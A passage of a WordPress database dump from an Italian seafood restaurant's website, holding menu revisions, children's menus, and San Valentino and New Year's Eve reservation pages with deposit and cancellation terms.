12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Zuppetta di Lumachine sgusciate con finocchio ,arancio e “scarpetta” croccante </em>\r\n\r\n<em>€ 12</em>\r\n\r\n<em> </em>\r\n\r\n<em>Insalatina di rombo e misticanza con tuille di parmigiano e crostini all’acciuga</em>\r\n\r\n<em>€ 13,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Filetto di triglia alla piastra con arancio e carciofo al vapore</em>\r\n\r\n<em>€ 13,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Piadine fritte ripiene di sardoncini grigliati,tropea e squacquerone</em>\r\n\r\n<em>€ 11,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>…e son già 23 anni ...</em>\r\n\r\n<em>L’ antipasto misto freddo </em>\r\n\r\n<em>Più qualità meno quantità € 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>I Gamberi alla greca (gli Originali dal 1994)</em>\r\n\r\n<em>con pomodoro fresco e formaggio fuso</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Per chi non mangia pesce</em>\r\n\r\n<em> </em>\r\n\r\n<em>Pinzimonio di verdure (vegano)</em>\r\n\r\n<em>€ 7,oo</em>\r\n\r\n<em>Insalatina aromatica alla frutta (vegano)</em>\r\n\r\n<em>€ 9,00</em>\r\n\r\n<em>Julienne di zucchine marinate con i pinoli (vegano)</em>\r\n\r\n<em>€ 8,oo</em>\r\n\r\n<em>Parmigiana di melanzane</em>\r\n\r\n<em>€ 10,0o</em>\r\n\r\n<em> </em>\r\n\r\n<em>in questo ristorante possono essere utilizzati prodotti surgelati all’origine(nella fattispecie di gamberi e calamari) tuttavia è nostro scrupolo selezionare anche in questo caso, sempre</em> <em>la qualità migliore</em>','Antipasti Cotti','','inherit','closed','closed','','47-revision-v1','','','2017-01-24 16:24:15','2017-01-24 15:24:15','',47,'http://www.ristorantesolymar.it/2017/01/24/47-revision-v1/',0,'revision','',0),(277,2,'2020-07-21 19:53:54','2020-07-21 17:53:54','<em> Il Pesce</em>\n\n<em>(Secondi Piatti )</em>\n\n<em>Mazzancolle nostrane alla griglia con pnzimonio di verdure</em>\n\n<em>€22,00</em>\n\n<em> </em>\n\n<em>Filetto di Rombo Chiodato ai profumi mediterranei su schiacciata di patate e maionese di polpo (120/140gr)</em>\n\n<em>€ 2o,oo     </em>\n\n<em> </em>\n\n<em>Tataki di Ricciola del Mediterraneo, panzanella di frutta e verdura, maionese di avocado </em>\n\n<em>€ 20,oo</em>\n\n<em> </em>\n\n<em>La Nostra Catalana tiepida di Astice e Mazzancolle nostrane</em>\n\n<em>€ 22,oo</em>\n\n<em> </em>\n\n<em>Fritto misto con verdurine croccanti   </em><em>€ 23,oo</em>\n\nLa mezza porzione                                     <em>€ 14,oo</em>\n\n&nbsp;\n\n<em> </em>\n\n<em>Lo Spiedone di pesce grigliato e insalatina mista al balsamico</em>\n\n(La nostra grigliata per pigri)\n\n<em>€ 20,oo</em>\n\n&nbsp;\n\n<em> Per chi non mangia pesce</em>\n\n<em>Il cannolo croccante di pasta filo e verdure al curry</em>\n\n<em>€ 19,00</em>\n\n<em> </em>\n\n<em> </em>\n\n<em> </em>\n\n&nbsp;\n\n<em> </em>\n\n&nbsp;\n\n<em> </em>\n\n&nbsp;\n\n<em> </em>\n\n&nbsp;\n\n<em> </em>\n\n&nbsp;\n\n<em> </em>\n\n<em>La fritturina di verdure (vegano)         € 11,00</em>\n\n<em> </em>','Il Pesce','','inherit','closed','closed','','108-autosave-v1','','','2020-07-21 19:53:54','2020-07-21 17:53:54','',108,'http://www.ristorantesolymar.it/2017/01/24/108-autosave-v1/',0,'revision','',0),(278,2,'2017-01-24 16:29:12','2017-01-24 15:29:12','<em>(Secondi Piatti )</em>\r\n\r\n<em>Mazzancolle Nostrane in padella con spinaci croccanti,burro e salvia e agretto di lamponi(2/300</em>\r\n\r\n<em>€ 20,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Mazzancolle Nostrane alla griglia con pinzimonio (2/300gr)</em>\r\n\r\n<em>€ 20,oo     </em>\r\n\r\n<em> </em>\r\n\r\n<em>Filetto di Rombo Chiodato in porchetta ,con patate,finocchietto e bacon (120/140 gr)</em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tataky di Ricciola grigliato con panzanella di frutta e verdura(cott. al sangue) (120/140gr)</em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Scaloppe di Pescatrice alla parmigiana, con melanzana passita, pomodoro confit e spuma di bufala (120/140gr)</em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La nostra Catalana tiepida di Astice e Mazzancolle nostrane</em>\r\n\r\n<em>€ 22,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Frittura mista con verdurine croccanti</em>\r\n\r\n<em>€ 22,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La Mezza porzione di Frittura con verdure</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Spiedone di Pesce grigliato e insalatina mista al balsamico</em>\r\n\r\n<em>(la nostra grigliata per pigri)</em>\r\n\r\n€ 19,00\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Per chi non mangia pesce </em>\r\n\r\n<em> </em>\r\n\r\n<em>Hamburger di soia (vegano)       € 9,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Cannolo croccante di pasta filo e verdure al curry     € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Crocchette dorate alle verdure (vegano)         € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Scortichino di seitan e tofu con verdure croccanti al balsamico (vegano)       € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Fritturina di verdure (vegano)         € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>','Il Pesce','','inherit','closed','closed','','108-revision-v1','','','2017-01-24 16:29:12','2017-01-24 15:29:12','',108,'http://www.ristorantesolymar.it/2017/01/24/108-revision-v1/',0,'revision','',0),(279,2,'2017-01-24 16:33:42','2017-01-24 15:33:42','<em> ” Oggi”</em>\n\n<em>     </em><em>Entrée di Benvenuto</em>\n\n<em>  Degustazione di Antipasti (un crudo e due cotti)</em>\n\n<em>    Il Primo</em>\n\n<em>    Il Secondo</em>\n\n<em> Pre Dessert</em>\n\n<em> Dessert</em>\n\n<em>  € 48,oo cad *per tutto il tavolo (min due persone)</em>\n\n<em>  € 53,oo cad per una parte del tavolo (min due persone)</em>\n\n<em>  (bevande escluse)</em>\n\n<strong><em> </em></strong>\n\n<strong><em> </em></strong>\n\n<em> </em>\n\n<em> “ come 23 anni fa “</em>\n\n<em> Tonno “Porchettato” su crema di finocchio e olio alle erbe aromatiche</em>\n\n<em> I Gamberi alla Greca(gli originali)</em>\n\n<em> Spaghetto “Pastificio dei Campi “ alle Vongole</em>\n\n<em> Frittura mista e Spiedone grigliato</em>\n\n<em> Sorbetto al caffè</em>\n\n<em> € 43,oo cad.*per tutto il tavolo( min 2 persone)</em>\n\n<em> € 46,oo cad. per una parte del tavolo(min 2 pers)</em>\n\n<em> (bevande escluse )</em>\n\n<em> I Menù non sono ordinabili contemporaneamente allo stesso tavolo</em>\n\n* eccezione di singoli ,bambini e vegetariani','Le 5 portate dello chef','','inherit','closed','closed','','5-autosave-v1','','','2017-01-24 16:33:42','2017-01-24 15:33:42','',5,'http://www.ristorantesolymar.it/2017/01/24/5-autosave-v1/',0,'revision','',0),(280,2,'2017-01-24 16:33:51','2017-01-24 15:33:51','<em> ” Oggi”</em>\r\n\r\n<em>     </em><em>Entrée di Benvenuto</em>\r\n\r\n<em>  Degustazione di Antipasti (un crudo e due cotti)</em>\r\n\r\n<em>    Il Primo</em>\r\n\r\n<em>    Il Secondo</em>\r\n\r\n<em> Pre Dessert</em>\r\n\r\n<em> Dessert</em>\r\n\r\n<em>  € 48,oo cad *per tutto il tavolo (min due persone)</em>\r\n\r\n<em>  € 53,oo cad per una parte del tavolo (min due persone)</em>\r\n\r\n<em>  (bevande escluse)</em>\r\n\r\n<strong><em> </em></strong>\r\n\r\n<strong><em> </em></strong>\r\n\r\n<em> </em>\r\n\r\n<em> “ come 23 anni fa “</em>\r\n\r\n<em> Tonno “Porchettato” su crema di finocchio e olio alle erbe aromatiche</em>\r\n\r\n<em> I Gamberi alla Greca(gli originali)</em>\r\n\r\n<em> Spaghetto “Pastificio dei Campi “ alle Vongole</em>\r\n\r\n<em> Frittura mista e Spiedone grigliato</em>\r\n\r\n<em> Sorbetto al caffè</em>\r\n\r\n<em> € 43,oo cad.*per tutto il tavolo( min 2 persone)</em>\r\n\r\n<em> € 46,oo cad. per una parte del tavolo(min 2 pers)</em>\r\n\r\n<em> (bevande escluse )</em>\r\n\r\n<em> I Menù non sono ordinabili contemporaneamente allo stesso tavolo</em>\r\n\r\n* eccezione di singoli ,bambini e vegetariani','Le 5 portate dello chef','','inherit','closed','closed','','5-revision-v1','','','2017-01-24 16:33:51','2017-01-24 15:33:51','',5,'http://www.ristorantesolymar.it/2017/01/24/5-revision-v1/',0,'revision','',0),(281,2,'2017-01-24 16:35:22','2017-01-24 15:35:22','<em>Per i piccoli ospiti…e solo per loro</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<strong><em>Menù “Spiderman &amp; Principesse”</em></strong>\r\n\r\n<em>Gnocchetti al Ragù o pomodoro </em>\r\n\r\n<em>Cotoletta con patate fritte</em>\r\n\r\n<em>Gelato </em>\r\n\r\n<em>€ 20 </em>\r\n\r\n<strong><em>Menù “Capitan Uncino”</em></strong>\r\n\r\n<em>Gnocchetti di patate alle vongole</em>\r\n\r\n<em>Sogliola alla griglia patate fritte</em>\r\n\r\n<em>Gelato</em>\r\n\r\n<em>€ 22,00 escluso bevande</em>\r\n\r\n<strong><em>Menù “Peter Pan “</em></strong>\r\n\r\n<em>Tortellini alla panna o al ragù</em>\r\n\r\n<em>Hamburger di manzo e pollo con patate fritte</em>\r\n\r\n<em>Gelato</em>\r\n\r\n<em>€ 22,00 escluso bevande</em>\r\n\r\n<strong><em>Alla carta</em></strong>\r\n\r\n<em>Coperto €   2,00 </em>\r\n\r\n<em>Primi piatti</em>\r\n\r\n<em>Gnocchi al pomodoro                                                                                                          € 9,oo</em>\r\n\r\n<em>Gnocchi al ragù                                                                                                                   € 10,oo</em>\r\n\r\n<em>Gnocchi alle vongole                                                                                                         € 11,oo</em>\r\n\r\n<em>Spaghetti alle vongole                                                                                                      €13,oo</em>\r\n\r\n<em>Tortellini alla panna                                                                                                            € 10,oo</em>\r\n\r\n<em>Tortellini al ragù                                                                                                                € 10,oo</em>\r\n\r\n<strong><em>Secondi piatti</em></strong>\r\n\r\n<em>Cotoletta con patate fritte                                                                                                 € 13,oo</em>\r\n\r\n<em>Sogliola alla griglia con patate fritte                                                                                     € 13,00</em>\r\n\r\n<em>Hamburger di manzo e pollo con carote a filini                                                                € 12,oo</em>\r\n\r\n<em>Hamburger di manzo e pollo con patate fritte                                                                 € 12,oo</em>','Menù Bambini','','inherit','closed','closed','','14-revision-v1','','','2017-01-24 16:35:22','2017-01-24 15:35:22','',14,'http://www.ristorantesolymar.it/2017/01/24/14-revision-v1/',0,'revision','',0),(4299,1,'2018-08-03 14:29:55','2018-08-03 14:29:55','','shop-img-27','','inherit','open','closed','','shop-img-27','','','2018-08-03 14:29:55','2018-08-03 14:29:55','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-27.jpg',0,'attachment','image/jpeg',0),(283,2,'2017-02-02 12:11:02','2017-02-02 11:11:02','<h2>14 Febbraio\r\n\"Semplicemente \"</h2>\r\n<strong>Menu\'</strong>\r\n<em>Crudo di gamberi rosa con salsa di gamberi, cocco e zenzero</em>\r\n\r\nTagliatelline di seppia su crema di scarola e maionese di ricci di mare\r\n\r\nParmigiana di triglia\r\n\r\nNegativo di scoglio (Primo )\r\n\r\nFiletto di cernia con carciofi e arancio\r\n\r\nNuvola croccante alla vaniglia, yoghurt e zuppetta di fragole al lime\r\n\r\n90€ coppia\r\n45 € per i singoli\r\nBevande escluse\r\n\r\nOrario di inizio 20,15\r\n(non si accettano prenotazioni dopo le 21,30)\r\n\r\n<strong>Modalità di prenotazione online per la cena di San Valentino 2017</strong>\r\n[product_category category=\"san-valentino\"]\r\n\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso,nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 10 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Menù di San Valentino 2017','','publish','closed','closed','','menu-san-valentino-2017','','','2017-03-28 09:34:23','2017-03-28 07:34:23','',0,'http://www.ristorantesolymar.it/?p=283',0,'post','',0),(284,1,'2017-02-02 12:11:02','2017-02-02 11:11:02','14 Febbraio\r\n\"Semplicemente \"\r\n \r\nMenu\'\r\nCrudo di gamberi rosa con salsa di gamberi, cocco e zenzero\r\n \r\nTagliatelline di seppia su crema di scarola e maionese di ricci di mare\r\n \r\nParmigiana di triglia\r\n \r\nNegativo di scoglio(Primo )\r\n \r\nFiletto di cernia con carciofi e arancio\r\n \r\nNuvola croccante alla vaniglia, yoghurt e zuppetta di fragole al lime\r\n \r\n90€ coppia\r\n45 € per i singoli\r\nBevande escluse\r\n \r\nOrario di inizio 20,15\r\nnon si accettano prenotazioni dopo le 21,30\r\n \r\n \r\nModalità di prenotazione per la cena di San Valentino 2017e\r\nLa disponibilità dei tavoli con la relativa capienza,  è riportata in basso,nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nLa scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 10 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara','Menù di San Valentino 2017','','inherit','closed','closed','','283-revision-v1','','','2017-02-02 12:11:02','2017-02-02 11:11:02','',283,'http://www.ristorantesolymar.it/2017/02/02/283-revision-v1/',0,'revision','',0),(285,1,'2017-02-02 12:12:10','2017-02-02 11:12:10','','sanvalentino2017','','inherit','open','closed','','sanvalentino2017','','','2017-02-02 12:12:10','2017-02-02 11:12:10','',283,'http://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino2017.jpg',0,'attachment','image/jpeg',0),(286,1,'2017-02-03 09:36:48','2017-02-03 08:36:48','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino2017-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-285\" /><h2>14 Febbraio\n\"Semplicemente \"</h2>\n \n<strong>Menu\'</strong>\n<em>Crudo di gamberi rosa con salsa di gamberi, cocco e zenzero\n \nTagliatelline di seppia su crema di scarola e maionese di ricci di mare\n \nParmigiana di triglia\n \nNegativo di scoglio (Primo )\n \nFiletto di cernia con carciofi e arancio\n \nNuvola croccante alla vaniglia, yoghurt e zuppetta di fragole al lime</em>\n \n90€ coppia\n45 € per i singoli\nBevande escluse\n \nOrario di inizio 20,15\n(non si accettano prenotazioni dopo le 21,30)\n\n<strong>Modalità di prenotazione online per la cena di San Valentino 2017</strong>\n[product_category category=\"capodanno\"]\n\nLa disponibilità dei tavoli con la relativa capienza,  è riportata in basso,nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 10 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nLa ricevuta del pagamento, vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nGrazie per la comprensione\nTeo & Barbara','Menù di San Valentino 2017','','inherit','closed','closed','','283-autosave-v1','','','2017-02-03 09:36:48','2017-02-03 08:36:48','',283,'http://www.ristorantesolymar.it/2017/02/02/283-autosave-v1/',0,'revision','',0),(287,1,'2017-02-02 12:13:10','2017-02-02 11:13:10','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino2017-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-285\" /><h2>14 Febbraio\r\n\"Semplicemente \"</h2>\r\n \r\n<strong>Menu\'</strong>\r\n<em>Crudo di gamberi rosa con salsa di gamberi, cocco e zenzero\r\n \r\nTagliatelline di seppia su crema di scarola e maionese di ricci di mare\r\n \r\nParmigiana di triglia\r\n \r\nNegativo di scoglio (Primo )\r\n \r\nFiletto di cernia con carciofi e arancio\r\n \r\nNuvola croccante alla vaniglia, yoghurt e zuppetta di fragole al lime</em>\r\n \r\n90€ coppia\r\n45 € per i singoli\r\nBevande escluse\r\n \r\nOrario di inizio 20,15\r\nnon si accettano prenotazioni dopo le 21,30\r\n \r\n \r\nModalità di prenotazione per la cena di San Valentino 2017\r\nLa disponibilità dei tavoli con la relativa capienza,  è riportata in basso,nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nLa scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 10 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara','Menù di San Valentino 2017','','inherit','closed','closed','','283-revision-v1','','','2017-02-02 12:13:10','2017-02-02 11:13:10','',283,'http://www.ristorantesolymar.it/2017/02/02/283-revision-v1/',0,'revision','',0),(288,1,'2017-02-03 09:31:58','2017-02-03 08:31:58','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2020/01/solymar-14-febbraio-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-944\" /><em>La vita ha due doni preziosi: la bellezza e la verità. La prima l’ho trovata nel cuore di chi ama e la seconda nella mano di chi lavora.\r\n(Khalil Gibran)</em>\r\n\r\nMenù week end di San Valentino\r\nSan Valentino e Cena del 15 -2\r\n\r\n- Entrée di Benvenuto\r\n- Carpaccio di Mazzancolle nostrane, campari, arancio e kefir\r\n- Noci di Capasanta arrostita, crema di finocchio allo zenzero e salicornia\r\n- Calamaro puntarelle e Alici del Cantambrico\r\n- Tortelli di patate e burrata sl ragù di Astice e pomodorini\r\n- Rollé di Sogliola nostrana al tartufo su patata fondente\r\n- Cioccolato bianco lampone e liquirizia\r\n-caffè\r\n\r\n€ 55 a persona bevande escluse\r\nPrenotazione con caparra (obbligatoria )\r\nwww.ristorantesolymar.it\r\n\r\nModalità di prenotazione online per la cena di San Valentino 2020\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di mercoledi 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Prenotazione Tavolo per 2 Persone San Valentino','Tavolo per 2 persone serata San Valentino - anticipo caparra confirmatoria. La caparra si intende per 2 persone (15euro x 2)','publish','closed','closed','','prenotazione-tavolo-per-2-persone-san-valentino','','','2020-02-11 19:54:28','2020-02-11 18:54:28','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-2-persone-san-valentino/',1,'product','',0),(289,1,'2017-02-03 09:37:37','2017-02-03 08:37:37','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino2017-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-285\" /><h2>14 Febbraio\r\n\"Semplicemente \"</h2>\r\n \r\n<strong>Menu\'</strong>\r\n<em>Crudo di gamberi rosa con salsa di gamberi, cocco e zenzero\r\n \r\nTagliatelline di seppia su crema di scarola e maionese di ricci di mare\r\n \r\nParmigiana di triglia\r\n \r\nNegativo di scoglio (Primo )\r\n \r\nFiletto di cernia con carciofi e arancio\r\n \r\nNuvola croccante alla vaniglia, yoghurt e zuppetta di fragole al lime</em>\r\n \r\n90€ coppia\r\n45 € per i singoli\r\nBevande escluse\r\n \r\nOrario di inizio 20,15\r\n(non si accettano prenotazioni dopo le 21,30)\r\n\r\n<strong>Modalità di prenotazione online per la cena di San Valentino 2017</strong>\r\n[product_category category=\"san-valentino\"]\r\n\r\nLa disponibilità dei tavoli con la relativa capienza,  è riportata in basso,nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 10 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara','Menù di San Valentino 2017','','inherit','closed','closed','','283-revision-v1','','','2017-02-03 09:37:37','2017-02-03 08:37:37','',283,'http://www.ristorantesolymar.it/2017/02/03/283-revision-v1/',0,'revision','',0),(290,1,'2017-02-03 09:38:36','2017-02-03 08:38:36','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/02/san-valentino-2019-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-728\" />Tavolo per 4 persone serata San Valentino - anticipo caparra confirmatoria. La caparra si intende per 4 persone (15euro x 4)\r\n\r\nMenù:\r\nBattuto di pesce azzurro con pomodori secchi e spuma di bufala\r\nFiletto di pagro , carciofi al tegame e pesto alla menta\r\nSeppiolino spadellato nel suo ragù e variazione di topinambur\r\nBottoni di patate viola con mazzancolle nostrane e spinacini\r\nInsalatina di astice e canocchie al lime su crema all\'astice e latte di cocco\r\ntropical\r\n\r\n50€ a persona bevande escluse\r\n\r\nOrario di inizio 20,30\r\n(non si accettano prenotazioni dopo le 21,30)\r\n\r\n<strong>Modalità di prenotazione online per la cena di San Valentino 2019</strong>\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in questa pagina, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va \"tassativamente\" compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di martedì 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n\r\n','Prenotazione Tavolo per 4 Persone San Valentino','Tavolo per 4 persone serata San Valentino - anticipo caparra confirmatoria. La caparra si intende per 4 persone (15euro x 4)','pending','closed','closed','','prenotazione-tavolo-per-4-persone-san-valentino','','','2020-01-31 12:23:14','2020-01-31 11:23:14','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone-san-valentino/',1,'product','',0),(291,1,'2017-02-03 18:15:16','2017-02-03 17:15:16','','Order &ndash; febbraio 3, 2017 @ 06:15 PM','','wc-processing','open','closed','order_5894ba10e5b73','ordine-feb-03-2017-0512-pm','','','2017-02-03 18:15:16','2017-02-03 17:15:16','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=291',0,'shop_order','',3),(292,1,'2017-02-04 09:34:23','2017-02-04 08:34:23','<a href=\"http://www.ristorantesolymar.it/2017/02/02/menu-san-valentino-2017/\"><img class=\"alignnone size-medium wp-image-285\" src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino2017-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" /></a>\r\n\r\n<a href=\"http://www.ristorantesolymar.it/2017/02/02/menu-san-valentino-2017/\">Scopri il menù e prenota il tuo tavolo</a>','Menù di San Valentino','','publish','closed','closed','','menu-san-valentino','','','2017-02-07 15:45:19','2017-02-07 14:45:19','',0,'http://www.ristorantesolymar.it/?post_type=popuppress&#038;p=292',0,'popuppress','',0),(293,1,'2017-02-04 09:50:11','2017-02-04 08:50:11','<img class=\"alignright size-medium wp-image-285\" src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/02/sanvalentino2017-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" />\r\n<h2>14 Febbraio\r\n\"Semplicemente \"</h2>\r\n<strong>Menu\'</strong>\r\n<em>Crudo di gamberi rosa con salsa di gamberi, cocco e zenzero</em>\r\n\r\nTagliatelline di seppia su crema di scarola e maionese di ricci di mare\r\n\r\nParmigiana di triglia\r\n\r\nNegativo di scoglio (Primo )\r\n\r\nFiletto di cernia con carciofi e arancio\r\n\r\nNuvola croccante alla vaniglia, yoghurt e zuppetta di fragole al lime\r\n\r\n90€ coppia\r\n45 € per i singoli\r\nBevande escluse\r\n\r\nOrario di inizio 20,15\r\n(non si accettano prenotazioni dopo le 21,30)\r\n\r\n<strong>Modalità di prenotazione online per la cena di San Valentino 2017</strong>\r\n[product_category category=\"san-valentino\"]\r\n\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso,nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 12,00 di venerdi 10 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Menù di San Valentino 2017','','inherit','closed','closed','','283-revision-v1','','','2017-02-04 09:50:11','2017-02-04 08:50:11','',283,'http://www.ristorantesolymar.it/2017/02/04/283-revision-v1/',0,'revision','',0),(294,1,'2017-02-04 09:52:37','2017-02-04 08:52:37','<img class=\"alignright size-medium wp-image-236\" src=\"http://www.ristorantesolymar.it/wp-content/uploads/2016/11/capodanno-solymar-300x300.jpg\" alt=\"capodanno-solymar\" width=\"250\" height=\"250\" /><em>Spaghettino di spigola alla carbonara</em>\r\n\r\nRicordo di infanzia: Filetto di paganello su crema di pancotto e giardiniera della casa\r\n\r\nTriglia di scoglio al tartufo con patate vitelotte e fonduta al pecorino di fossa\r\n\r\nStrozzapreti lunghi con mazzancolle nostrane, salsiccia di mora romagnola e zucca\r\n\r\nTataki di rana pescatrice alle erbe e radici in varie forme e consistenze\r\n\r\nPepe,ricotta e fichi caramellati\r\n\r\n65,00€ a persona escluse bevande\r\n\r\n<strong>Prenota online il tuo tavolo per Capodanno 2017 a Riccione</strong>\r\n\r\n[product_category category=\"capodanno\"]\r\n\r\n<strong>Modalità di prenotazione per il cenone di capodanno</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di 